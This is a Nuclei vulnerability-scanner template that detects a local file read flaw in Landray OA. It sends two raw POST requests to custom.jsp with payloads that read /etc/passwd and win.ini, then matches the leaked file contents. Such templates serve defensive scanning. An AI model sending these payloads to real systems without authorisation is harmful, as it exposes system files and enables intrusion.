nuclei-templates/vulnerabilities/other/landray-oa-fileread.yaml

47 lines
1.3 KiB
YAML

id: landray-oa-fileread
info:
name: Landray-OA Fileread
author: pikpikcu
severity: high
reference: https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw
tags: landray,lfi
requests:
- raw:
- |
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
var={"body":{"file":"file:///etc/passwd"}}
- |
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
var={"body":{"file":"file:///c://windows/win.ini"}}
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
- "for 16-bit app support"
condition: or
- type: status
status:
- 200